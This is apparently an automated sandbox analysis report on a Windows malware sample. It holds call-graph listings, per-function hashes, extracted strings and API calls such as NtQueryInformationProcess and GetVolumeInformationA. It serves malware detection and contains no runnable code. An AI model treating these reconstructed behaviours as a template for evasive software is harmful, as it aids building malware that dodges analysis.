35260->35261 35267 9ac58dc 35260->35267 35261->35251 35265 9ac6f7d 35263->35265 35264 9ac6fb6 35264->35251 35265->35264 35266 9ac58dc 5 API calls 35265->35266 35266->35264 35268 9ac58e7 35267->35268 35270 9ac7028 35268->35270 35271 9ac5910 35268->35271 35270->35270 35272 9ac591b 35271->35272 35278 9ac5920 35272->35278 35274 9ac7097 35282 9acbef0 35274->35282 35290 9acbed8 35274->35290 35275 9ac70d1 35275->35270 35281 9ac592b 35278->35281 35279 9ac8098 35279->35274 35280 9ac6dc0 5 API calls 35280->35279 35281->35279 35281->35280 35283 9acbf11 35282->35283 35285 9acbf2d 35283->35285 35298 9acc168 35283->35298 35301 9acc158 35283->35301 35284 9acbf6d 35288 2ddc3d0 3 API calls 35284->35288 35289 2ddc3c0 3 API calls 35284->35289 35285->35275 35288->35285 35289->35285 35291 9acbee2 35290->35291 35293 9acbf2d 35291->35293 35294 9acc168 5 API calls 35291->35294 35295 9acc158 5 API calls 35291->35295 35292 9acbf6d 35296 2ddc3d0 3 API calls 35292->35296 35297 2ddc3c0 3 API calls 35292->35297 35293->35275 35294->35292 35295->35292 35296->35293 35297->35293 35305 9acc19b 35298->35305 35299 9acc172 35299->35284 35302 9acc168 35301->35302 35304 9acc19b 5 API calls 35302->35304 35303 9acc172 35303->35284 35304->35303 35306 9acc1b9 35305->35306 35309 9acc1dc 35305->35309 35312 2ddcb10 2 API calls 35306->35312 35313 2ddcb00 2 API calls 35306->35313 35314 2ddb520 GetModuleHandleW 35306->35314 35317 2ddce38 35306->35317 35307 9acc1c4 35307->35309 35316 9acc19b 5 API calls 35307->35316 35321 9acc398 35307->35321 35308 9acc1d4 35308->35309 35325 9acb17c 35308->35325 35309->35299 35312->35307 35313->35307 35314->35307 35316->35308 35318 2ddce40 GetModuleHandleW 35317->35318 35320 2ddceb5 35318->35320 35320->35307 35323 9acc3ac 35321->35323 35322 9acc3d1 35322->35308 35323->35322 35324 9acb17c LoadLibraryExW 35323->35324 35324->35322 35326 9acc3f8 LoadLibraryExW 35325->35326 35328 9acc471 35326->35328 35328->35309 35329 144f030 35330 144f03e NtQueryInformationProcess 35329->35330 35332 144f0cc 35330->35332 35004 2dd06c8 35005 2dd0710 CreateFileMappingW 35004->35005 35007 2dd075c 35005->35007 35008 9ac1af0 SetTimer 35009 9ac1b5c 35008->35009 35010 2dd0400 35011 2dd0448 CreateFileW 35010->35011 35013 2dd0491 35011->35013 35014 2dd6900 35017 2dd6986 GetVolumeInformationA 35014->35017 35016 2dd6be3 35017->35016

                        Executed Functions

                        Function 01440C80 Relevance: 65.7, Strings: 47, Instructions: 6969COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: QY$dla$ "y$"fIx$$~0p$%4:3$+[f$4*$$882+$:*\$;1tu$;N{=$>d=$?1$X$AYp$HF@v$I> _$QH3p$Z_=/$[Q8$^$)]$av(p$b0U$$b0_3$cPvV$gK`$jm5$j.($k<-u$k|^U$m/~l$q,}$u&+&$v(Cn$xl~b${SyZ${S]$|]~l$|uoJ$;!X$M5$S$b:8$drq$iQ7$l{G$x/T
                        • API String ID: 0-3358476858
                        • Opcode ID: ce73b9ae8bee7ef7c48aea4e36016009fd8059b82e9de788cc4c5fd2838c03e7
                        • Instruction ID: 236a9fc900d3b52aa18378620149946ab4f97045224edc57b3f98533245d856c
                        • Opcode Fuzzy Hash: ce73b9ae8bee7ef7c48aea4e36016009fd8059b82e9de788cc4c5fd2838c03e7
                        • Instruction Fuzzy Hash: EFD37B75F002298BCB64DF28C94469AB7B2FB89204F1181EAD90DF7750DB35AE95CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01440C90 Relevance: 65.7, Strings: 47, Instructions: 6960COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: QY$dla$ "y$"fIx$$~0p$%4:3$+[f$4*$$882+$:*\$;1tu$;N{=$>d=$?1$X$AYp$HF@v$I> _$QH3p$Z_=/$[Q8$^$)]$av(p$b0U$$b0_3$cPvV$gK`$jm5$j.($k<-u$k|^U$m/~l$q,}$u&+&$v(Cn$xl~b${SyZ${S]$|]~l$|uoJ$;!X$M5$S$b:8$drq$iQ7$l{G$x/T
                        • API String ID: 0-3358476858
                        • Opcode ID: 62b3749cb1150d79e01a10fc8a7d21b5197d91bd1b6d799620623b014e8b2934
                        • Instruction ID: e07ad927d6ecbec182bfb8b2468aa7659aadcf445d2c36e6bcd0394d8c6ac3ba
                        • Opcode Fuzzy Hash: 62b3749cb1150d79e01a10fc8a7d21b5197d91bd1b6d799620623b014e8b2934
                        • Instruction Fuzzy Hash: A8D37B75F002298BCB64DF28C94469AB7B2FB89204F1181EAD90DF7750DB35AE95CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144CA10 Relevance: 12.3, Strings: 9, Instructions: 1072COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: +569$,aq$Wl9^$iMAl$paq$wa.c$zu;b$>3n$qzQ
                        • API String ID: 0-2802485408
                        • Opcode ID: f4460ad3596c853eab5df3ef5c4a920a0e3db4621275e3792f512e99bf3255a7
                        • Instruction ID: 1cd52214df441f1c4019dd17ef75331101a0bd862b93a9d6c8230404a17e6b32
                        • Opcode Fuzzy Hash: f4460ad3596c853eab5df3ef5c4a920a0e3db4621275e3792f512e99bf3255a7
                        • Instruction Fuzzy Hash: 0DA24F75E00218DFDB58CFAAE894A9DBBB2BF98314F05809AE515AB371DB309D45CF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144C340 Relevance: 9.2, Strings: 7, Instructions: 406COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2122 144c340-144c364 2123 144c367-144c38d call 14486e0 2122->2123 2127 144c393-144c3b3 2123->2127 2127->2123 2128 144c3b5-144c3c4 2127->2128 2129 144c3c6-144c3e9 2128->2129 2130 144c42a-144c44b 2128->2130 2131 144c3f2-144c419 2129->2131 2132 144c3eb 2129->2132 2133 144c451-144c45d 2130->2133 2134 144c4f2-144c4f8 2130->2134 2138 144c41f-144c425 2131->2138 2139 144c60a-144c692 call 1448608 2131->2139 2132->2131 2132->2134 2135 144c494-144c4f1 call 1448608 2132->2135 2136 144c55c-144c5fc call 1448608 2132->2136 2137 144c6ef-144c6fb 2132->2137 2133->2123 2140 144c463-144c473 2133->2140 2134->2127 2141 144c4fe-144c55b call 1448608 2134->2141 2136->2123 2190 144c602-144c609 2136->2190 2143 144c705-144c758 2137->2143 2144 144c6fd-144c704 2137->2144 2138->2137 2139->2144 2140->2136 2142 144c479-144c486 2140->2142 2142->2123 2145 144c48c-144c48f 2142->2145 2161 144c75a-144c765 call 14485d0 2143->2161 2145->2137 2172 144c794-144c7b4 2161->2172 2173 144c767-144c792 2161->2173 2172->2161 2189 144c7b6-144c7ba 2172->2189 2173->2172 2184 144c7bb-144c80f call 14486e0 2173->2184 2204 144c811 call 144c880 2184->2204 2205 144c811 call 144c890 2184->2205 2197 144c817-144c826 2198 144c828-144c849 2197->2198 2206 144c84c call 144d9c7 2198->2206 2207 144c84c call 144ca10 2198->2207 2208 144c84c call 144d960 2198->2208 2209 144c84c call 144ca01 2198->2209 2199 144c852-144c861 2200 144c863-144c86f 2199->2200 2201 144c87a-144c87f 2199->2201 2200->2198 2202 144c871-144c875 call 1448608 2200->2202 2202->2201 2204->2197 2205->2197 2206->2199 2207->2199 2208->2199 2209->2199
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$-i6s$Haq$\s]q$;]q$PS7$UrY
                        • API String ID: 0-2408275168
                        • Opcode ID: e952270c26c5e4d67dc321c6451653100bc5c85c2f27acc5fa56ec302900fa00
                        • Instruction ID: 4d249e04f60dd9228438acbc07b66239658626a307ae13ccfc3b9a15e0275651
                        • Opcode Fuzzy Hash: e952270c26c5e4d67dc321c6451653100bc5c85c2f27acc5fa56ec302900fa00
                        • Instruction Fuzzy Hash: D5D1E836F002258FD754DFADD89459EBBE2FFC8220F1A416AE909EB365DA319C05C790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144DA68 Relevance: 5.6, Strings: 4, Instructions: 556COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2256 144da68-144da73 2257 144da78-144da92 2256->2257 2259 144da94-144da9e 2257->2259 2260 144dabc-144dac2 2257->2260 2259->2260 2261 144daa0-144dab9 2259->2261 2260->2257 2262 144dac4-144dae5 2260->2262 2264 144dcf2-144dd05 2262->2264 2265 144daeb-144daf9 2262->2265 2265->2257 2266 144daff-144db1e 2265->2266 2266->2264 2269 144db24-144db6f 2266->2269 2272 144dba6-144dbd3 2269->2272 2273 144db71-144db9b 2269->2273 2278 144dbd5-144dbde 2272->2278 2279 144dc30-144dc66 2272->2279 2273->2259 2280 144dba1 2273->2280 2278->2257 2281 144dbe4-144dbe8 2278->2281 2282 144dcdc-144dcef 2279->2282 2289 144dc68-144dc77 2279->2289 2280->2282 2284 144dbee-144dbfa 2281->2284 2285 144dd08-144dd44 2281->2285 2284->2257 2286 144dc00-144dc1f 2284->2286 2298 144dd49-144dd74 call 14486e0 call 144c890 2285->2298 2286->2257 2294 144dc25-144dc2b 2286->2294 2291 144dcb1-144dcd6 2289->2291 2292 144dc79-144dcae 2289->2292 2291->2282 2292->2291 2294->2282 2306 144dd76-144dd94 2298->2306 2307 144df16-144df36 call 144ca10 2306->2307 2308 144dd9a-144dda6 2306->2308 2311 144df3b-144df4d 2307->2311 2308->2306 2309 144dda8-144ddf4 2308->2309 2319 144de22-144de52 2309->2319 2312 144df72-144df78 2311->2312 2313 144df4f-144df58 2311->2313 2312->2306 2316 144df7e-144df85 2312->2316 2313->2306 2315 144df5e-144df6c call 1448608 2313->2315 2315->2312 2321 144de54-144de60 2319->2321 2322 144ddf6-144ddf9 2319->2322 2321->2309 2323 144de66-144debf 2321->2323 2324 144df86-144dfac 2322->2324 2325 144ddff-144de1d 2322->2325 2323->2306 2333 144dec5-144decd 2323->2333 2332 144dfb1-144dfc2 call 14486e0 2324->2332 2325->2319 2340 144dfc4-144dfe3 call 1448d98 2332->2340 2335 144decf-144dedb 2333->2335 2336 144deea-144deff 2333->2336 2335->2298 2338 144dee1-144dee4 2335->2338 2336->2298 2339 144df05-144df10 2336->2339 2338->2336 2339->2307 2343 144dfe5-144dfea 2340->2343 2344 144dff2-144dff8 2340->2344 2343->2344 2345 144e04d-144e061 2344->2345 2346 144dffa-144e017 2344->2346 2350 144e062-144e072 2345->2350 2351 144e0a8-144e0c0 2345->2351 2346->2332 2347 144e019-144e04c call 1449690 2346->2347 2353 144e074-144e0a5 2350->2353 2354 144e0d1 2350->2354 2353->2351 2356 144e0d3-144e0e3 2354->2356 2357 144e118-144e14d call 144a1a0 2354->2357 2360 144e0e8-144e0fc 2356->2360 2357->2360 2369 144e14f-144e154 2357->2369 2363 144e0fe-144e100 2360->2363 2364 144e10a-144e115 2360->2364 2363->2364 2364->2357
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,aq$:^O$[jY4$zfxv
                        • API String ID: 0-254122083
                        • Opcode ID: 7b94f92b392e523b928ecd978a8f016c68185fa4eec5faeaca30e393224a5ac8
                        • Instruction ID: 1eb33c0c70705839c4c98d2bc3626158436fc70d98c5fdf5efaa273abfc4eb77
                        • Opcode Fuzzy Hash: 7b94f92b392e523b928ecd978a8f016c68185fa4eec5faeaca30e393224a5ac8
                        • Instruction Fuzzy Hash: 0512F676F002258FD714DFACC8945AABBF2AF98210B1641AADD15EB371DA74DC02CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01449690 Relevance: 3.2, Strings: 2, Instructions: 737COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: jt#$O<
                        • API String ID: 0-2952409307
                        • Opcode ID: 1474b2ec1d19d6588a27949e23a775ed64761d037fb89209f089c8451b14c197
                        • Instruction ID: 235ddfeb7bcdba1d1ebe873d26236de7075f496ed1304468857967139dc7210a
                        • Opcode Fuzzy Hash: 1474b2ec1d19d6588a27949e23a775ed64761d037fb89209f089c8451b14c197
                        • Instruction Fuzzy Hash: 3742E476B401258FEB28EE6DC49853FB6E6BF8C618756046ED906EB3B4DE30CC059790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01448810 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2722 1448810-144885c 2723 144885f-144886a 2722->2723 2724 144886d-1448879 2723->2724 2725 144887f-14488a0 2724->2725 2725->2723 2727 14488a2-14488de 2725->2727 2727->2723 2730 14488e4-144890a 2727->2730 2730->2723 2731 1448910-144891a 2730->2731 2732 1448920-1448926 2731->2732 2733 1448a91-1448aa6 2731->2733 2732->2723 2734 144892c-1448976 2732->2734 2733->2725 2735 1448aac-1448ae4 call 1448748 2733->2735 2734->2724 2740 144897c 2734->2740 2735->2724 2739 1448aea-1448aff 2735->2739 2739->2724 2741 1448b05-1448b1e 2739->2741 2742 1448a5d-1448a85 2740->2742 2743 1448b86-1448b8c 2741->2743 2744 1448b20-1448b37 2741->2744 2745 1448981-144899e call 14486e0 2742->2745 2746 1448a8b 2742->2746 2743->2727 2750 1448b92-1448bb6 call 1440c90 call 14484b8 2743->2750 2747 1448b74-1448b7b 2744->2747 2748 1448b39-1448b45 2744->2748 2763 14489a0-14489c5 2745->2763 2764 14489cb-1448a57 call 1448748 2745->2764 2746->2733 2752 1448b81 2747->2752 2753 1448d38-1448d4c 2747->2753 2748->2727 2751 1448b4b-1448b5d 2748->2751 2771 1448bbb-1448bd2 2750->2771 2755 1448d53-1448db3 2751->2755 2756 1448b63-1448b6f 2751->2756 2752->2725 2753->2755 2769 1448db5-1448db7 2755->2769 2770 1448dbb-1448dbe 2755->2770 2756->2743 2759 1448b71 2756->2759 2759->2747 2763->2764 2764->2742 2773 1448dd4-1448df8 2769->2773 2775 1448db9 2769->2775 2770->2773 2774 1448dc0-1448dd3 2770->2774 2771->2727 2777 1448bd8-1448c17 2771->2777 2783 1448dfd-1448e2d call 1448608 2773->2783 2775->2774 2778 1448c4c-1448c52 2777->2778 2778->2778 2782 1448c54-1448c63 2778->2782 2788 1448c65-1448c78 2782->2788 2789 1448c19-1448c38 2782->2789 2799 1448e2f-1448e33 2783->2799 2792 1448c7f-1448c8f 2788->2792 2790 1448c7a 2789->2790 2791 1448c3a-1448c46 2789->2791 2790->2792 2791->2778 2792->2792 2796 1448c91 2792->2796 2796->2753
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: Ev&5$N3Cm
                        • API String ID: 0-1629072489
                        • Opcode ID: 16c2caa91dbcfaf8f3cb2ff96d3da258794d413d932808078180761669a3e7fb
                        • Instruction ID: 59f94211770ae39976e19f33b289ac0480fec29bf4a2a19fd2b68dba090b9cc4
                        • Opcode Fuzzy Hash: 16c2caa91dbcfaf8f3cb2ff96d3da258794d413d932808078180761669a3e7fb
                        • Instruction Fuzzy Hash: 87D18275F047068FEB58CFA9D8D459EBBF2AF98200B15813EE519DB362DA709C46CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD1D40 Relevance: 2.1, Strings: 1, Instructions: 806COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: Haq
                        • API String ID: 0-725504367
                        • Opcode ID: b845da97b060786da88ae7dad64eca0b54fae5a6723a726baed76e766ce32615
                        • Instruction ID: 743f3f0aaaa7825fdb2093fc8cf3018ad445cf3f007f7fa4f5a36330dc150ebc
                        • Opcode Fuzzy Hash: b845da97b060786da88ae7dad64eca0b54fae5a6723a726baed76e766ce32615
                        • Instruction Fuzzy Hash: 62728B35A00A05CFC714CF68C498AAEBBF2FF88314B158969D85A9B756D730FD46CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDCB10 Relevance: 1.8, APIs: 1, Instructions: 304COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3386 2ddcb10-2ddcb36 3389 2ddcb38-2ddcb4f call 2ddb520 call 2ddb804 3386->3389 3390 2ddcb66-2ddcb6e 3386->3390 3399 2ddcb54-2ddcb60 3389->3399 3391 2ddcbb4-2ddcbee call 2ddb81c 3390->3391 3392 2ddcb70-2ddcb75 call 2ddb810 3390->3392 3410 2ddcd9a-2ddcdcc 3391->3410 3411 2ddcbf4-2ddcc3f 3391->3411 3396 2ddcb7a-2ddcbaf 3392->3396 3407 2ddcc42-2ddcc9b call 2ddd0d9 call 2ddb520 call 2ddb828 3396->3407 3399->3390 3400 2ddcd6c-2ddcd93 3399->3400 3400->3410 3435 2ddcca0-2ddcca4 3407->3435 3426 2ddcdd3-2ddce15 3410->3426 3411->3407 3439 2ddce16-2ddce1d 3426->3439 3436 2ddccaa-2ddccb7 3435->3436 3437 2ddcd60-2ddcd6b 3435->3437 3442 2ddccbd-2ddccea call 2ddb520 call 2ddb81c 3436->3442 3443 2ddcd5c-2ddcd5e 3436->3443 3439->3439 3441 2ddce1f-2ddce80 3439->3441 3444 2ddce88-2ddceb3 GetModuleHandleW 3441->3444 3445 2ddce82-2ddce85 3441->3445 3442->3443 3455 2ddccec-2ddccf9 3442->3455 3443->3426 3443->3437 3447 2ddcebc-2ddced0 3444->3447 3448 2ddceb5-2ddcebb 3444->3448 3445->3444 3448->3447 3455->3443 3456 2ddccfb-2ddcd12 call 2ddb520 call 2ddb834 3455->3456 3461 2ddcd1f-2ddcd4e call 2ddb828 3456->3461 3462 2ddcd14-2ddcd1d call 2ddb828 3456->3462 3461->3443 3470 2ddcd50-2ddcd5a 3461->3470 3462->3443 3470->3443 3470->3461
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 414cd6e865401b9624cd9b9e20748cdbcd65dde8da624dcc2bd49144ff82a027
                        • Instruction ID: b3398a6d30185d72c32f1272a7bbb92a2c6f08af25a9750d2fc65592c816ef8a
                        • Opcode Fuzzy Hash: 414cd6e865401b9624cd9b9e20748cdbcd65dde8da624dcc2bd49144ff82a027
                        • Instruction Fuzzy Hash: 49C15A70A00B458FDB14DF69D884A6EBBF6FF88304B158A6AC44A9B751DB74EC05CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD68F4 Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3473 2dd68f4-2dd6992 3475 2dd69cb-2dd69f0 3473->3475 3476 2dd6994-2dd699e 3473->3476 3481 2dd6a67-2dd6a6b 3475->3481 3482 2dd69f2-2dd6a1f 3475->3482 3476->3475 3477 2dd69a0-2dd69a2 3476->3477 3478 2dd69c5-2dd69c8 3477->3478 3479 2dd69a4-2dd69ae 3477->3479 3478->3475 3483 2dd69b0 3479->3483 3484 2dd69b2-2dd69c1 3479->3484 3485 2dd6a6d-2dd6ab1 3481->3485 3486 2dd6ab5-2dd6ad1 3481->3486 3493 2dd6a4f-2dd6a54 3482->3493 3494 2dd6a21-2dd6a23 3482->3494 3483->3484 3484->3484 3487 2dd69c3 3484->3487 3485->3486 3489 2dd6ad3-2dd6afa 3486->3489 3490 2dd6b42-2dd6b46 3486->3490 3487->3478 3504 2dd6afc-2dd6afe 3489->3504 3505 2dd6b2a-2dd6b2f 3489->3505 3491 2dd6b48-2dd6b86 3490->3491 3492 2dd6b8a-2dd6be1 GetVolumeInformationA 3490->3492 3491->3492 3499 2dd6bea-2dd6c03 3492->3499 3500 2dd6be3-2dd6be9 3492->3500 3506 2dd6a56-2dd6a62 3493->3506 3496 2dd6a45-2dd6a4d 3494->3496 3497 2dd6a25-2dd6a2f 3494->3497 3496->3506 3502 2dd6a31 3497->3502 3503 2dd6a33-2dd6a41 3497->3503 3508 2dd6c1c-2dd6c20 3499->3508 3509 2dd6c05-2dd6c11 3499->3509 3500->3499 3502->3503 3503->3503 3513 2dd6a43 3503->3513 3514 2dd6b20-2dd6b28 3504->3514 3515 2dd6b00-2dd6b0a 3504->3515 3524 2dd6b31-2dd6b3d 3505->3524 3506->3481 3511 2dd6c36-2dd6c5d 3508->3511 3512 2dd6c22-2dd6c2e 3508->3512 3509->3508 3526 2dd6c6d-2dd6c71 3511->3526 3527 2dd6c5f-2dd6c63 3511->3527 3512->3511 3513->3496 3514->3524 3522 2dd6b0c 3515->3522 3523 2dd6b0e-2dd6b1c 3515->3523 3522->3523 3523->3523 3528 2dd6b1e 3523->3528 3524->3490 3532 2dd6c81-2dd6c85 3526->3532 3533 2dd6c73-2dd6c77 3526->3533 3527->3526 3531 2dd6c65 3527->3531 3528->3514 3531->3526 3534 2dd6c95 3532->3534 3535 2dd6c87-2dd6c8b 3532->3535 3533->3532 3536 2dd6c79 3533->3536 3539 2dd6c96 3534->3539 3535->3534 3537 2dd6c8d 3535->3537 3536->3532 3537->3534 3539->3539
                        APIs
                        • GetVolumeInformationA.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 02DD6BD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationVolume
                        • String ID:
                        • API String ID: 2039140958-0
                        • Opcode ID: 555c7832878ca21e7824f4d524f6a67b0a59ac1bdd3aadf0e7ce46bf31f042f2
                        • Instruction ID: 02b0dbc3eec53c42e4ee5dc9d2eec3004a417d05b0d01ae41145c856e6f4747e
                        • Opcode Fuzzy Hash: 555c7832878ca21e7824f4d524f6a67b0a59ac1bdd3aadf0e7ce46bf31f042f2
                        • Instruction Fuzzy Hash: 63C14870D006199FDB24CFA8D891BAEBBF5FF48304F148069E859AB391D774A985CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD6900 Relevance: 1.8, APIs: 1, Instructions: 271COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3540 2dd6900-2dd6992 3542 2dd69cb-2dd69f0 3540->3542 3543 2dd6994-2dd699e 3540->3543 3548 2dd6a67-2dd6a6b 3542->3548 3549 2dd69f2-2dd6a1f 3542->3549 3543->3542 3544 2dd69a0-2dd69a2 3543->3544 3545 2dd69c5-2dd69c8 3544->3545 3546 2dd69a4-2dd69ae 3544->3546 3545->3542 3550 2dd69b0 3546->3550 3551 2dd69b2-2dd69c1 3546->3551 3552 2dd6a6d-2dd6ab1 3548->3552 3553 2dd6ab5-2dd6ad1 3548->3553 3560 2dd6a4f-2dd6a54 3549->3560 3561 2dd6a21-2dd6a23 3549->3561 3550->3551 3551->3551 3554 2dd69c3 3551->3554 3552->3553 3556 2dd6ad3-2dd6afa 3553->3556 3557 2dd6b42-2dd6b46 3553->3557 3554->3545 3571 2dd6afc-2dd6afe 3556->3571 3572 2dd6b2a-2dd6b2f 3556->3572 3558 2dd6b48-2dd6b86 3557->3558 3559 2dd6b8a-2dd6be1 GetVolumeInformationA 3557->3559 3558->3559 3566 2dd6bea-2dd6c03 3559->3566 3567 2dd6be3-2dd6be9 3559->3567 3573 2dd6a56-2dd6a62 3560->3573 3563 2dd6a45-2dd6a4d 3561->3563 3564 2dd6a25-2dd6a2f 3561->3564 3563->3573 3569 2dd6a31 3564->3569 3570 2dd6a33-2dd6a41 3564->3570 3575 2dd6c1c-2dd6c20 3566->3575 3576 2dd6c05-2dd6c11 3566->3576 3567->3566 3569->3570 3570->3570 3580 2dd6a43 3570->3580 3581 2dd6b20-2dd6b28 3571->3581 3582 2dd6b00-2dd6b0a 3571->3582 3591 2dd6b31-2dd6b3d 3572->3591 3573->3548 3578 2dd6c36-2dd6c5d 3575->3578 3579 2dd6c22-2dd6c2e 3575->3579 3576->3575 3593 2dd6c6d-2dd6c71 3578->3593 3594 2dd6c5f-2dd6c63 3578->3594 3579->3578 3580->3563 3581->3591 3589 2dd6b0c 3582->3589 3590 2dd6b0e-2dd6b1c 3582->3590 3589->3590 3590->3590 3595 2dd6b1e 3590->3595 3591->3557 3599 2dd6c81-2dd6c85 3593->3599 3600 2dd6c73-2dd6c77 3593->3600 3594->3593 3598 2dd6c65 3594->3598 3595->3581 3598->3593 3601 2dd6c95 3599->3601 3602 2dd6c87-2dd6c8b 3599->3602 3600->3599 3603 2dd6c79 3600->3603 3606 2dd6c96 3601->3606 3602->3601 3604 2dd6c8d 3602->3604 3603->3599 3604->3601 3606->3606
                        APIs
                        • GetVolumeInformationA.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 02DD6BD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationVolume
                        • String ID:
                        • API String ID: 2039140958-0
                        • Opcode ID: 5ad9e6f2412bc8bf82e4c0f35c95dca1a9d475fedb84a58c900283ce20adc56c
                        • Instruction ID: 54b036bc2d38b5afcd86dcb3a18a65a192b0cf0701428ce1931026ce048c12b9
                        • Opcode Fuzzy Hash: 5ad9e6f2412bc8bf82e4c0f35c95dca1a9d475fedb84a58c900283ce20adc56c
                        • Instruction Fuzzy Hash: 67C14770E006198FDB24CFA8D891B9EBBF5FF48304F148469E859A7391DB74A985CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144EFC9 Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 0144F0BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 75d5028504d558d2fa779921168a20b2e259761b1ce9900fa795a047d6e9255b
